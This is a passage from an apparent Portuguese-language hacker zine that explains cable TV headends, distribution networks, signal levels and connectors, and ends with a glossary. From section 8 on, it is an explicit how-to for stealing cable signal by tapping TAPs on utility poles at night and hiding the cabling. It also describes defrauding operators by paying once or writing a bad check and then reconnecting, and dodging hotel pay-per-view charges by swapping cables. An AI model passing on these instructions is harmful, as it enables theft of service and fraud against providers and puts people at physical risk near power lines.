todos os canais e os servicos que deverao ser prestados pelo sistema, inclusive a codificacao e o controle de assi- nantes. Implica diretamente na arquitetura a se adaptada no projeto do Headend. 3.5 - Definicao da arquitetura da rede Com base em todos os dados obtidos nas etapas anteriores, e' efetuada a definicao da arquitetura de rede a ser adotada. 3.6 - Definicao do Local do Headend e seus equipamentos Uma vez conhecida a Arquitetura de Rede a ser adotada, a sua topolo- gia e abrangencia e' possivel determinar a localizacao adequada do Headend, seu tipo ( Standard, IRC ou HRC ) e seus equipamentos. O ti- po de Headend a se adotado dependera dos parametros pre-definidos. 3.7 - Definicao dos Equipamentos da Rede Conhecendo-se todos os parametros definidos ate esta etapa e' possi- vel entao fazer-se a definicao tecnica dos equipamentos a serem ado- tados na Rede. E'feito entao um estudo tecnico que leva em ensaios e simulacoes a obtencao da melhor distribuicao de pontos em melhores circunstancias. 3.8 - Realizacao do Projeto Tecnico da Rede Quando se tem essas informacoes pode-se iniciar o projeto tecnico, por falta de legislacao Brasileira nesse assunto e' usual adotar-se os Padroes Tecnicos da NCTA e do FCC dos EUA. Os parametros de segu- ranca, margens de tolerancia e outros fatores arbitrarios ficam por conta da engenharia de cada empresa. 3.9 - Definicao dos Padroes de Construcao Define o modo de construcao, o hardware a ser utilizado e o grau de qualidade das operacoes no campo. Estabelece padronizacoes de procedimentos. 3.10- Construcao e Ativacao da Rede de Conexao dos Assinantes Essa e' a etapa mis visivel, pois da forma fisica a todo o trabalho executado anteriormente. Mas e' gracas a todas as etapas que se tem seguranca em confianca que o sistema vai operar. OBS:. Ate agora demonstrei os procedimentos... logo logo entra o te- or tecnico da historia!! 4. Os Equipamentos Basicos da TV via Cabo:. ^^ ^^^^^^^^^^^^ ^^^^^^^ ^^ ^^ ^^^ ^^^^^^ Ate agora vimos que os sinais de TV chegam ate o Headend e sao enca- minhados via Cabo ate a residencia do assinante. Portanto vamos ver como as coisas acontecem primeiro no headend para depois irmos para a rede. A funcao prinicpal do HEADEND e' receber os diversos programas de te- levisao vindos via satelites, transmissores locais ou ate mesmo fi- tas transformando-os em canais de TV! Very simple uh? Dah uma olhada neste esqueminha e veja se fica visivel: ----- |---RECEPTOR DE SATELITE----MODULADOR-| C | CANAIS VIA SATELITE | | O | |---RECEPTOR DE SATELITE----MODULADOR-| M | | B | | I |--P/ O CABO-> CANAIS LOCAIS ------|---DEMODULADOR-------------MODULADOR-| N | | | E | |---PROCESSADOR-----------------------| R | | * | VIDEO E AUDIO ------> GRAVACAO LOCAL------------MODULADOR-| * | ----- Vou tentar listar abaixo os diversos sinais no Headend: 1-: Canais Via Satelite Uma ou mais antenas parabolicas sao direcionadas para os diversos sa- telites. Os sinais desses satelites sao entao captados pelas antenas e encaminhados aos receptores, que recuperam o VIDEO e o AUDIO do transponder sintonizado. ( Os canais no satelite sao chamados de transponders ). Os sinais de Video e Audio sao entao encaminhados a um modulador, que imprime essa informacao numa portadora de RF gera- da pelo proprio modulador. Pronto, ja temos um canal de Televisao a partir de um sinal recebido via satelite. O processo repete-se para todos os programas que dese- jamos captar via satelite 2-: Canais Locais ou Off Air Os canais locais de TV, de VHF e UHF sao recebidos por antenas comuns e encaminhados para Processadores de Canal que podem converter as fre- quencias originais de RF. Isto e'os canais sao recebidos e suas fre- quencias convertidas diretamente para os canais desejados. Bah! Vou dar exemplo que sei q tem neguinho boiando: um programa pode chegar no processador pelo canal 35 e ser reprocessado para o canal 48 estan- do pronto para ser enviado para o sistema de TV a Cabo. 3-: Canais Gerados Localmente Os programas gerados localmente, por fitas, discos ou em estudio tem seus sinais de Video e Audio encaminhados diretamente aos demuladores, gerando assim os canais de TV desejados :) 4-: Condificacao de outros Servicos O sistema de codificacao esta representado num unico bloco, mas na verdade e' mais complexo. E' mais facil vc entendelo como um sofisti- cado sistema eletronico controlado por computador, que tem habilidade de condificar os sinais, de modo que soh os assinantes autorizados possam recebe-lo. Sao aquelas porras de Pay per View, Home Shopping e outros, sao dependentes do Sistema Codificado e de alguns equipamen- tos especiais adicionados ao Headend. 5-: O agrupamento de todos os canais Ao final todos estes canais sao agrupados por meio do Combinador ( combiner ), ficando todos os bichinhos num unico cabo. Pronto!! Ai entra a TV via Cabo e apartir dai o RF pode ser enviado via cabo para toda a rede. 6-: Fibra Oticas Atualmente o sinal RF proviniente do Headend normalmente e' conver- tido em Luz e enviado via Fibra Otica para a rede. Dah uma olhada no proximo desenho. E' muito simples, um transmissor otico converte o sinal de RF em Luz, que se propaga pela fibra depois chega no recep- tor otico e vira RF denovo mantendo todas informacoes, em outras pa- lavras, mantendo a modulacao. > > > > |------------| > > > > -------------------------/|transmissor |\_________________________ -------------------------\| otico |/ fibra otica | cabo coaxial com sinal RF |------------| | | | | < < < < |------------| < < < < | -------------------------/| receptor |\________________________| -------------------------\| otico |/ cabo coaxial com sinal RF |------------| 5. A Rede de TV via Cabo:. ^ ^^^^ ^^ ^^ ^^^ ^^^^^^ Bem, ja temos a ideia de como o sinal e' recebido e como e' enviado `a rede pelo Headend. Mas la na rua onde a rede e'realmente construida basta instalar um cabo e ta tudo pronto? no, no, no... Os sinais RF tem a pessima caracteristica de se atenuar na medida que vao percorrendo o cabo. E pior ainda, nem todos os sinais sao atenua- dos igualmente. Os canais de frequencia mais alta sao mais atenuados que os com freque- ncia mais baixa ( 61 e 3 no caso da NET ). Assim quando dois sinais de niveis iguais mais frequencias diferentes forem enviados pelo cabo, eles chegamao seu destino com niveis diferentes. E' por causa dessa ate- nuacao e essas diferencas, que a Rede de Cabos precisa ser planejada. As linhas principais, Trunk Lines, aqui no brasil apelidadas de Tron- cais levam o sinal ate as diversas partes do sistema, sem que nenhum as- sinante esteja diretamente conectado nelas. Como o sinal vai sendo ate- nuado ao longo do caminho conforme a distancia e o cabo sao instalados TRUNK AMPLIFIERS ( amplificadores troncais de espaco em espaco, para restaurar o nivel do sinal. Restaurar significa nao apenas recuperar os niveis orignais, mas tambem corrigir aquelas diferencas de atenuacao que ocorrem entre os canais. Equalizando eles... Para servir os assinantes de uma dada area e' utilizado um amplificador chamado de Bridger Amplifier, normalmente incorporado ao Amplifier Tron- cal. Esse amplificador permite seguir com os sinais nos Troncais e, ao mesmo tempo, criar um derivacao secundaria, chamada de Feeder Line, ou linha de Distribuicao, onde, atraves do TAP, conecta-se o assinante ( no caso vc ;)) O comprimento das Linhas de Distribuicao e a quantidade de TAPs nelas instalados acarretam uma atenuacao na intensidade dos sinais e por is- so, nos pontos adequados sao instalados os LINE EXTENDERS. Esse negocio com nome complicado restaura o sinal da linha de distribui- cao permitindo maior numero de assinantes. Quando o sinal esta baixo a imagem fica podre!!! Entao para nao deixar as linhas abertas o TAP recebe uma terminacao fechando aquele buraquinho para que nenhuma malandro venha e coloque um cabo que vai lhe dar o poder de ter TV a Cabo roubada! =) 6. Arquitetura da Rede:. ^^^^^^^^^^^ ^^ ^^^^^^ A arquitetura basica se chama Tree and Branch, acho q e' ramificacao em arvore. Hoje em dia existem formas mais modernas e avancadas mas isso deixamos pros profissionais que fazem tanto que ja tem na sua cabeca o esquema pronto. A arquitetura mais usada no Brasil e' a Fiber to Feeder e foi desenvolvida com base nas necessidades geradas pelos grandes sis- temas, a partir de estudos desenvolvidos entre fabricantes e operadores de grande porte! ( lembra-me xerox na tolken ) heheheh! 7. Equipamentos mais Usados ^^^^^^^^^^^^ ^^^^ ^^^^^^ MULTIMETRO: e' o instrumento de teste mais comum e serve pra efetuar medidas de Resistencia Eletrica, de corrente e de Tensao. Na rede pode verificar a tensao das fontes de alimentacao e a continuidade de fusi- veis nos equipamentos de rede. Pode, eventualmente, medir curto circuito num cabo. Para correta medida dos valores de tensao nas fontes, se for comprar um pegue um apto a efe- tuar medidas de valor RMS PRECO R$ 50,00 - um de boa qualidade MEDIDOR DE NIVEL: e' o instrumento que pode medir o nivel de cada canal presente no sistema de Cabo. Permite ajustar o nivel dos amplificadores e sua equalizacao. E' tb usado pra confirmar nivel dos sinais recebidos PRECO R$ 700,00 - Paraguai se consegue por menos. ( nao e' totalmente necessario, uma vez com sinal roubado nao vai se fresquiar por nao ter nivel perfeito, ok? ) ANALISADOR DE ESPECTRO: e'o mais poderoso equipamento para diagnostico do desempenho das Redes de TV via Cabo. O instrumento pode mostrar em uma tela um grafico bonitinho da amplitude de todos os canais, medindo o seu nivel. Bem util pra que gosta de lidar com satelites.* Soh compra essa porra que e'cara pra caralho se tu quiser virar ladrao de TV a Cabo profissional, hehehehe! E ser preso, pra variar! PRECO R$ 2.300,00 - Paragua tem por mais barato. Ainda tem o Gerador de Padrao de Video, Medidores de Modulacao, Osci- loscopios, Vectorscopes e outros... mas isso vamos improvisar depois! 8. Vamos comecar a roubar:.. ^^^^^ ^^^^^^^ ^ ^^^^^^^^^ 8.1 - Observacoes gerais Primeiro vc deve observar o poste que sera a vitima, veja se este possui uma rede de TV a Cabo, em algumas cidade colocam-se placas nos postes informando que por ali passa, em todo caso observe o fio mais baixo e mais grosso, que se usa da rede eletrica para alimentar suas fontes. Um fiozinho que liga o eletrico ate o coaxial. Faca tudo da maneira mais discreta possivel, de preferencia a noite, claro que nao me responsabilizo se levares um tiro do seu pai ou de seu vizinho que tem toda razao em desconfiar de um assaltante. Nao esqueca de puxa o fio sempre junto com outro para sua casa, tipo o telefonico, use uma altura minima de 5 metros para obedecer as nor- mas evitando que sejas descoberto. Vc nao precisar fucar em nada na sua casa, tipo antena, rede eletri- ca, nem mesmo desliga-los. Como vc vai subir no poste eu nao sei, problema e' unica e exclusivamente seu ';) 8.2 - Conectando o Cabo ate o Postinho de Entrada Pode se comecar de duas maneiras, fixando primeiro no postinho de entrada e depois esticar ate o poste do TAP/ACOPLADOR/DIVISOR, ou conectar primeiro no poste TAP/ACOPLADOR/DIVISOR e lancar o cabo ate o postinho. Eu vejo a diferenca unicamente nos obstaculos da rua, tra- fego ou sei lah! Normalmente ate onde eu sei se comeca pelo poste do TAP para poder trabalhar melhor no outro extremo. Nota: Utilizar sempre cabo com mensageiro RG-59 pra residencias e RG-11 para predios. NAO FACA EMENDAS. Nota2: Claro que vai ter que comprar esses cabos, se o cara perguntar pra que vc quer... dia que e' pra comer. Nao sao caros! Lancar ele paralelo ao da linha telefonica, nao cruze os cabos senao da merda e tu te fode. Quando subir no paste dobre ele 30 cm sobre si mesmo, nao amarre ele com no' pq senao da problema no cobre. Quando nosso cabo acompanhar os fios da copanhia eletrica ( trajeto do poste-postinho ) deve-se deixar uma distancia de aproximadamente 30 a 40 cm, mas como vc nao e'bobo vai colocar mais pertinho pra nin- guem descofiar! 8.3 - Conexao do Cabo ate a Rede Externa Instale o Q Span clamp a 25 cms do equipamento ( tap, acoplador, di- visor, amplificador ) onde sera conectador o cabo e nunca menos de 65 cm do centro do poste. Isto e', do lado do "tap". Nunca instale o Q Span Clamp prensando o fio de espinar. Nunca nstale o Q Span Clamp en outra coisa q nao seja o mensageiro. Se o Q Span clamp e' instalado do lado do poste que nao possui "tap" fixe-o a mais de 65 cm do poste. O correto e' deixar 10 cm de loop pra futuras trocas de cabo, mas quem aqui se importa com o que e' certo? Nunca passe o cabo de entrada acima do prensa-cabo da abracadeira do poste. Faca passagem por baixo pra evitar danos posteriores. Cuidado pra nao amassar o cabinho quando for fixar principalmente no RG-59 ou RG-11, eles sao frageis e flexiveis. 8.4 - Distribuicao Interna Sempre e' usado um canal-piloto pra medicao de sinal! Este e' o 50 servindo como referencia com -379,2625 Mhz ( video ). * nivel de saida do TAP: 15 dBmv no CH 50 +/- 2 dBmv * nivel de entrada na TV: de 1 a 5 dBmv +/- 2 dBmv Vamos dar uma olhada nos componentes usados nas conexoes, lembrando que estes podem ser adquiridos em uma boa eletronica. VALORES DE PERDA DE DIVISORES ( 550 Mhz ) 8.5 - Componentes a serem usados na instalacao Divisor de 1 para 2 ( 2 way splitter ) PERDA IN ____/--\---- OUT Especificado Arredondado \--/---- OUT 4,2 dB 4,5 dB Divisor de 1 para 3 ( 3 way splitter ) balanceado PERDA IN ____/--\---- OUT Especificado Arredondado \--/---- OUT 5,6 dB 6,0 dB | ---- OUT Divisor 1 para 3 ( 3 way splitter unbalanced ) nao balanceado PERDA IN ____/--\*--- OUT Especificado \--/---- OUT 7,0 dB | ---- OUT 7,0 dB 3,5 dB ( nao balanceado ) Vamos parar por ai ja que estamos tratando de residencia, e nao e' necessario um 4 way splitter, tb nao quero confundir a cabeca de ninguem mas e' necessario saber a perda de sinal no splitter se vc quiser saber se ainda vai ter sinal pra vc ou pra planejar a distri- buicao da TV pela casa. Porque no TAP e' que vai entrar o roubo, sabendo que tem um buraco aberto com sinal amplificado beleza vai ser mole catar um ponto as- sinante sem ter que fazer merda nenhuma! Soh estou colocand todas as informacoes possiveis pra um guri que quer tentar fazer tudo =) 8.6 - Metodologia da Instalacao Interna Verifica antes de tudo se existe o backbone, componente que te for- nece sinal, geralmente um DCW. Antes de iniciar verifica o nivel do sinal do componente, este deve ser de 15 dBmV a 17 dBmV ( medir no canal 50 ). Olha antes de tudo se teu telefone funciona, pra depois nao falar que foi tu que fudeu com tudo. Quando for fazer a passagem do cabo coaxial pelo duto telefonico pe- lo amor de deus tenha cuidado com ambos os cabos, principalmente se o telefonico for um par trancado daqueles mais velhos q teu avo. 8.7 - Esquema Eletrico de Distribuicao Interna Nesse ponto vc deve sabe o nivel de sinal, quantos pontos de TV quer roubar, quantos metros tem do backbone ( caixa da CRT geralmente ) ao ponto da TV. Fazer um calculo de perda de cabo pra ver se vai ter ma- terial suficiente. Ao fazer o conector lembre-se de apertar bem, pq ai esta a maioria dos problemas de mal contato. O nivel MINIMO de sinal para uma TV e'0 dBmV. E o maximo e' em torno de 10 dBmV. Cada TV tem suas caracteristicas, mas pra efeito pratico recomendaram-me de 1 dBmV ate 5 dbmV. CX TELESP CX COZINHA CX SALA |------| 10 mts |------| 10 mts |-----| | BACK |-------------| |-------------| |----- | BONE | perda 2 dbs | | perda 2 dbs | | | |------| |------| |-----| | 10 Mts | Perda ( 2 dbs ) | |-----| | |-----| | | ---|---| | | | | | |-----| |-----| Quarto Quarto do irmao 1 TV 1 TV ( fuck him ) In 15 db Out 13,5 In 11,5 Out 10,0 17 dB________/12\_______________/09\_____________ \| / \| / \ DCW12 | TAP | TAP | | 3,0 dB | 2,5 dB | | | | | In 8,0 dB /--\ \__/ Out _____| |_____ Out 3,5 dB 3,5 dB Nota: 15 mts de cabo tem perda de 3 dB. Voce pode puxar dentro de casa ate 7 pontos sem precisar amplificar o sinal! Pode ser que os dois ultimos pontos nao peguem os canais internacionais por estarem proximos ao canal piloto. Esse e' o planejamento simples de distribuicao de sinal que fiz pra que vcs entendam melhor. Claro que nao vamos dar TV a cabo de "gra- tis" pro pequeno irmao que entope de ranho o teu mouse! Mas fiz assim para que se observe os niveis de sinal. Veja que o sinal sai em 17 dB perde sinal no 1 TAP onde ele e' divi- dido 3 em cabos. Esse e' um daqueles TAPzinhos que vimos no comecao :) O importante e' ele chegar com no minimo uns 3,5 dB na TV. Se vc der sorte nao vai precisar usar porra nenhuma de equipamento, e se vc entendeu fica mais facil ainda pq ai vc ve como e' ridiculamen- te simples, fato provado por sabermos que os peoes mais burros do mundo sao instaladores de TV a Cabo e por vc estar lendo a axur05 julgamos de saida que tenhas um QI normal. 8.8 - Funcionamento dos Conectores Esta parte e' facil, porem nem por isso perde sua importancia, como ja falei 90% dos problemas sao referentes a ma' conexoes entao e' im- portante que nosso pequeno fraudador entenda bem como faze-lo. E' sabido de todos que para qualquer ligacao entre cabo e TAP assim como de cabo para amplificador se usa o conector sendo ele macho ou femea dependendo do cabo ja que trabalhamos com RG-11 e RG-59 soh fa- laremos destes coaxiais que sao os unicos necessarios. ( duh! ) O conector de uma peca vem com um anel de crimpagem integrado a ele para firmeza e facilidade de instalacao. Este tipo fornece melhor pro- tecao contra entrada de umidade do que conector de duas pecas que tem o anel de crimpagem separado. Pra vc que esta boiando na maionese, crimpar e' selar, e' amassar o a- nel sobre o cabo fazendo com que ele fique firme. Prepare-se que agora vc vai usar um estilete, hehehe que emocao. 8.8.1 - Preparo do Conector RG-59 ( para cabo RG-59 ) E' o conector mais usado em todo sistema de distribuicao. Vou desenhar o cabo abaixo, nao sou artista, mas me esforco. -------------------------------| | <- corte vertical -------------------------------| ----------------------|_____ 1 |_2___|-3- 1- cabo ----------------------| 2- malha 3- central Obs. Faca isso com estilete! -------------/////////|_____ /////////|_____|--- -------------/////////| A malha deve ser colocada totalmente para tras com no maximo 5 mm. O que fica onde era o numero 2, no caso a blindagem deve ter o com- primento de 7 mm e o central deve ter 7 mm tambem. _s_s_s___/-----| -------------| |__ | | -------------|_s_s_s_________| Os tres aneis simbolizados pelos "s" devem ser crimpados, ou melhor apertados! Nao deve ficar nenhuma malha pra fora. 8.8.2 - Preparo do Conector RG-11 ( para cabo RG-11 corse... ) O procedimento e' basicamente o mesmo soh que deve se ter bastante cuidado pra nao ferir o condutor central que e' muito flexivel. E deixar 5mm na blindagem e 20mm na condutor central ( fio duro do meio ). Nao deve sobrar malha depois de colocar o conector, lembra- ndo sempre de crimpar os aneis! Ou se nao quiser tb nao arruma, soh que tem o risco de ficar ruim. :/ 8.9 - Esquema de Ligacao Esse asteriscos abaixo sao os buracos de conexao! Nao sou artista ascii, foda-se! :) 1. TV NAO COMPATIVEL * Sintonizar TV no canal 3 * Troca canais pelo conversor /----------------\ /-------------|---\ /----|----\ |cable in | | | * | | * * | | VHF in | | out CH3 | \---------/ \-----------------/ TV CONVERSOR 2. VCR COMPATIVEL / TV NAO COMPATIVEL * Sintonizar TV no canal 3 * Trocar canais pelo VCR /----------------\ /-------------|---\ /----|----\ | IN | | | * | | * * | | VHF in | | out CH3 | \---------/ \-----------------/ TV VCR CABO 3. TV E VCR NAO COMPATIVEIS * Sintonizar TV canal 3 * Sintonizar VCR no canal 3 * Trocar canais pelo conversor /----------------\ /-------------|---\ /----|-----------\ |cable in | | | * out CH3| | * * | | in * | | out CH3 | \------------|---/ \-----------------/ VCR | CONVERSOR | /---------\ | |VHF in | | | *--------------/ \---------/ TV 4. TV E VCR COMPATIVEL * Trocar os canais diretamente pelo VCR ou TV /----------------\ /-------------|---\ /----|----\ | IN | | | * | | * * | | VHF in | | out CH3 | \---------/ \-----------------/ TV VCR CABO 5. VCR COMPATIVEL / TV NAO COMPATIVEL COM POSSIBILIDADE DE ASSISTIR UM CANAL E GRAVAR OUTRO. * Sintonizar TV canal 3 * Apertar VCR no video e escolher o canal * Apertar VCR denovo * Pelo conversor trocar os canais da TV /----------------\ /-------------|---\ /----|-----------\ | in | | | * out CH3| | * * | |CABLE in * | | out | \------------|---/ \-----------------/ CONVERSOR | VCR CABO | /---------\ | |VHF in | | | *--------------/ \---------/ TV 9 - Mais facil, com pouco aproveitamento intelectual:. ^^^^ ^^^^^^ ^^^ ^^^^^ ^^^^^^^^^^^^^^ ^^^^^^^^^^^^^ Bem... bom... boom! Aqui e' pro cara que nao ta nem ai em aprender como funciona, soh quer a porra de TV a Cabo em casa Faz o seguinte, assina a NET ou TVA, ai eles instalam tudo bunitinho na tua casa, sabe o que vc faz? Para de pagar... paga soh o primeiro mes ou da um cheque sem fundo te vira. Ai eles deixam tudo instala- dinho, soh que quando vc parou de pagar eles simplesmente catam teu conversor ou desativam teu ponto! Agora que vc sabe como funciona procura na caixa do teu apto ou no poste no caso de residencia e ati- va novamente. O sinal foi medido direitinho, e se vc nao tem conver- sor pode usar um video cassete que tenha recurssos VCR ou uma dessas TV's caras e modernas que aceitam TV a cabo direto. Agora se vc mora em predio e nao quer se chatear veja primeiro se alguem tem TV a cabo lah, se estiver e' pq seu predio tem um TAPzinho esperando por vc, vai lah e faca todo o cabeamento lembrando dos pas- sos a seguir no que eu escrevi acima. Cuidado apenas com uma coisa, se vc colocar mais de um ponto na sua casa pode ser que o sinal che- gue baixo pra eles, ai eles vao reclamar, os caras vem torrar o saco porque vao ver que teu meteu os fios lah e ta roubando sinal. 10 - Falhas e Testes:. ^^^^^^ ^ ^^^^^^^^ Antes de conectar o cabo "drop" na porta do TAP verifique se o ni- vel de sinal nesta porta esta de acordo com o que e' necessario. Se nao for anote o valor do TAP/DC. A perda no cabo pode ser encontrada multiplicando-se o comprimento do cabo pela perda especificada pelo fabricante na frequencia mais alta projetada para o sistema dividido por 100. Uma perda tipica em um divisor por dois e' 3,5 dB e para um divi- sor de quatro 7 dB. Pra sua TV um bom nivel e' 3 ate 5 dBmV. Se os sinais em frequencias altas estao um pouco baixos mas em fre- quencias baixas sao bastante baixos ( -20 dBmV ), verifique o con- dutor central e veja se as pontas nao estao oxidadas. Pra usar o multimetro coloque ele na posicao R x 1 e a seguir um dos cabos de medida no orificio escrito "COM". Coloque o outro cabo no orificio escrito "OHMS". Junte as extremidades e coloque o pon- teiro no 0 Adjust. Olha sempre se na outra ponta nao tem um componente eletrico tipo um DCW que isso podera confundi-lo com um curto no cabo. O medidor deve indicar infinity ou seja, nao se move. Se indicar 0 ou menos de 10 ohms o cabo deve estar em curto. 11 - Glossario ( LEIA ISSO QUANDO NECESSARIO ) Criei este glossario para fins de consulta, esses termos foram pesquisa- dos em livros e principalmente conceituado por profissionais da area com quem eu me relaciono. Todos presumo eu estao corretos, podem ate estar imcompletos no seu total, mas ja ajuda ;) ACOPLADOR DIRECIONAL- Um equipamento que deriva um numero pre-determinado de sinais para uma ou duas saidas. AML ( ENLACE EM AMPLITUDE MODULADA )- Marca registrada para o equipamento de microondas fabricado pela Huges Communications Procuts Co. AMPLIFICADOR- Um aparelho que aceita um sinal como entrada e apresenta o mesmo sinal na saida, sem uma distorcao significativa mas com um nivel maior de am- plitude. Aplificadores de CATV trabalham e amplificam uma faixa relati- vamente larga do espectro. AMPLIFICADOR BRIDGE- Um amplificador introduzido no sistema para a transicao dos baixos ni- veis de transmissao no sub-sistema troncal, para niveis de transmissao mais altos no sub-sistema distribuidor. ATENUACAO- E' a reducao na amplitude do sinal quando ele se propaga pelo espaco ou por um meio de transmissao, equipamento, ou rede, expressa em decibeis. ATENUADOR- Um acessorio ou equipamento capaz de reduzir a amplitude de um sinal sem introduzir distorcao. Pode ser fixo ou variavel, com perda introdu- zida expressa em decibeis. Tambem chamada PAD. BANDA ALTA- O espectro de radio entre 174 e 216 Mhz. Os canais regulares de televi- sao de 7 a 13 estao incluidos neste espectro. BANDA BAIXA- O espectro de radio entre 54 e 88 Mhz. Os canais regulares de televisao de 2 a 6 estao neste espectro. BANDA MEDIA- O espectro de radio entre 88 e 174 Mhz que fica entre os canais regula- res de televisao 6 e 7. Os canais CATV de A a I ( 9 canais ) ficam neste espectro. BIDIRECIONAL- Descreve um sistema de transmissao que pode transportar sinais em ambos os sentidos simultaneamente. CABO COAXIAL- Dois condutores metalicos, separados por material dieletrico, um dentro do outro. CAPACIDADE DE SAIDA- Define a relacao entre a distorcao introduzida por intermodulacao e os niveis de sinal de saida operacionais, tendo capacidade de trafego do aparelho como um fator. CASCATA- Qualquer numero de amplificadores ou equipamentos conectados em sequencia, onde a saida de um esta conectado na entrada de outro. CICLO- Uma completa sequencia de valores de uma onda alternada, comecando em ze- ro, crescendo a um valor maximo positivo, descrescendo ate zero, caindo ate um valor minimo negativo, e indo ate zero novamente. CONTROLE AUTOMATICO DE GANHO ( AGC )- Um circuito que controla o ganho do amplificador automaticamente. CONTROLE AUTOMATICO DE SLOPE ( ASC )- Um circuito que controla o slope ( relacao do ganho pela frequencia ) de um amplificador automaticamente. CONVERSOR ASSINANTE- Uma unidade que transforma a frequencia das portadores entregues na residencia do assinante por um sistema CATV, em frequencia que pode ser sintonizada, detectada e mostrada pelos aparelhos de TV. DECIBEL ( dB )- Uma unicade de medida logaritima que espressa a relacao entre dois niveis discretos, entrada e saida. DECIBEL-MILIVOLTS ( dBmV )- Uma unidade de medida logaritima absoluta de voltagem. 0 dB denota a relacao entre dois niveis mas o termo mV estabelece que um dos termos e' uma referencia Zero dBmV e'um milivolt medidos em uma impedancia de 75 Ohms. Desde que a impedancia e' especificada o dBmV e' tb um nivel de potencia de referencia de 0,0133 microwatts. DISTORCAO DE SEGUNDA ORDEM- Sinais espurios gerados quando duas ou mais portadoreas sao passadas por um circuito nao linear. DISTORCAO POR BATIMENTO TRIPLO- Sinais espurios gerados quando tres ou mais portadoras sao passadas por um circuito nao linear. Os sinais espurios sao a soma e a diferen- ca de quaisquer tres portadoras, algumas vezes referido como batimen- tos. DISTORCAO POR INTERMODULACAO- A distorcao introduzida quando varias portadoras sao passadas atraves de um circuito nao linear. ECO- Energia refletida confinada em uma porcao do espectro que e' ocupada pelo sinal original. EQUALIZADOR- Um acessorio designado para compensar uma caracteristica indesejada de atraso ou perda de um sistema ou equipamento permitido ao mesmo passar todas as frequencias de uma maneira uniforme. EQUALIZAR- Aplicar em um meio de transmissao um equipamento cujas caracteristicas sao complementares de forma que a perda ou atraso no meio e no equipa- mento de equalizacao combinados facam as perdas ou atrasos totais. ESPECTRO- Uma feixa de frequencias cujas ondas tem caracteristicas comuns. Exemplo o espectro de audio de radio etc... O espectro de radio e' geralmente tomado por abranger a faixa entre 8 KHz e 300 GHz. FEEDER- Um sub-sistema, que faz parte do sistema troncal com distribuicao espe- cifico para CATV que prove uma completa distribuicao de sinal para os assinantes de uma secao limitada. FILTRO- Equipamento sensivel a frequencia, que passa prontamente ou barra fre- quencias especificas ou bandas de frequencias. FREQUENCIA- Para uma onda periodica como corrente alternada, e' o numero completo de cicles por uma unidade de tempo, geralmente referente a um segundo. GANHO- Um aumento de potencia produzido por um amplificador e expresso em de- cibeis. HETEDODINO- Combinacao de duas portadoras para gerar uma nova portadora Muda a frequencia de uma portadora para uma nova atraves do batimento desta com uma portadora gerada no oscilador local. INTERFERENCIA- Ruido ou outros disturbios como sinais espuriosque, quando introduzidos em um sinal desejado, reduz a inteligibilidade da informacao. LARGUDA DE BANDA- Uma faixa de frequencia definida pelos limites de uma frequencia supe- rior e uma inferior. LINE EXTENDER- Um amplificador nao sifisticado que opera em niveis relativamente altos de transmissao no sub-sistema de distribuicao de um sistema de CATV. LINEAR- Caracteristica de uma acesorio ou equipamento no qual a voltagem do sinal de saida e'diretamente proporcional a voltagem do sinal de entra- da. MEDIDOR DE NIVEL DE SINAL ( MEDIDOR DE CAMPO )- Um voltimetro de radiofrequencia sintonizavel, usualmente calibrado em decibeis por milivolt dBmV bem como voltagem. MICROONDA- Um termo que denota frequencias no aspecto magnetivo aprox. acima de 1 GHz MODULACAO- Processo pelo qual alguma caracteristica de uma onda como amplitude, fre- quencia ou fase e' variada de acordo com uma onda modulante. Este termo tambem e' comumente usado para se referir a informacao presente na porta- dora. MODULO DE GANHO- O mecanismo removivel da carcada do amplificador, que produz ganho. NIVEIS DE TRANSMISSAO- Os niveis de sinal espressos em dBmV, nos quais os amplificadores operam, ou sao projetados pra operar. OSCILADOR- Um circuito gerador de uma corrente alternada em um frequencia especifica. PERDA- Potencia dissipada em um acessorio, cabo ou equiapamento. Expresso em dB. PERDA NA TRANSMISSAO- A razao, expressa em decibeis, entre o nivel de potencia na entrada de um sistema, cabo ou equipamento, e o nivel de potencia na saida. PERDA NO CABO- A reducao no nivel do sinal introduzido pela passagem do sinal por um comprimento de cabo. RELACAO PORTADORA/RUIDO (C/N)- A diferenca entre a amplitude de uma portadora e a potencia de ruido que esta presente naquela porcao de espectro. RELACAO SINAL/RUIDO (S/N)- A diferenca entre amplitude de um sinal e o ruido presente no espectro ocupado pelo sinal quando ambos sao medidos no mesmo ponto. RESPOSTA- A fidelidade como a qual a saida de um sistema ou aparelho corresponde a sua entrada. RUIDO- Disturbios aleatorios introduzidos no sinal que tendem a obscurecer a informacao contida. SLOPE- A variacao do ganho em diferentes frequencias introduzido por um ampli- ficador por todo o espectro passante. SPLITTER- Um equipamento que divide a energia de entrada entre duas saidas. SUB-BANDA- O espectro de radio entre 5 e 54 Mhz SUPER-BANDA- O espectro de radio entre 216 e aproximadamente 400 Mhz TAP- Um equipamento que deriva uma quantidade pre'- determinada de energia para um ou mais saidas atenuadas, com proposito de enviar energia para os cavos de servico dos assinantes. O restante da energia entrada e' enviada para uma saida nao atenuada para continuar se propagando pelo sistema. TAXA DE BIT- A velocidade com a qual bits individuais de uma informacao digital sao transmitidos. TERMINACAO- Uma carga eletrica conectada ao cabo, equipamento ou acessorio pra casar o mesmo. Genericamente a terminacao tera a mesma impedancia da unidade ao qual foi conectada. TRONCO- Um subsistema "tronco e distribuicao" de CATV, que permit uma limitada distribuicao arterial do sinal atraves da area de servico de CATV. TVRO- Abrev. de "recepcao de televisao somente". Define um sistema que pode incluir antenas, pre-amplificadores e receptores para a recepcao somente de sinais de TV de uma satelite geoestacionario no espaco. UHF- O espectro do radio entre 300 e 3000 Mhz. Geralmente os canais 14 ate 69. VHF- O espectro do radio entre 30 e 300 Mhz. Geralmente os canais 2 ate o 13. 12 - Truques e sacanagens:. ^^^^^^^ ^ ^^^^^^^^^^^^ PAY PER FUCK >: --------------- Esse e' um esquema serissimo! O cara queria me vender o codigo da codificacao usada pra este tipo de sinal. Como ele demorou muito eu roubei. Lancerei o mesmo em breve na parte de projetos da pagi- na da axur05 Burlando sistema interno de hoteis >: ------------------------------------- Isso e' simples, nao vou entrar em detalhes tecnicos. Usei numa viagem para os EUA, nao sei se tem isso no Brasil! E' o seguinte, vc tem o televisor ligado por um cabo tipo RJ-45 (tipo de modem) e um frigobar com o mesmo esquema! Basta trocar os cabos de um com o outro, o transmissor de informacoes e' o mesmo, mas na hora da recepcao um nao le os sinais do outro e ai vc nao paga. Da pra ver aqueles canais pagos ( sexo, filmes novos ) sem levar um susto com a conta na hora de sair do hotel. A gurizada que vai pra Disney! Pode fazer que eu garanto ja testei no Mariott. Criando seu proprio canal de TV >: ---------------------------------- Tira o cabo da TV a cabo que chega na 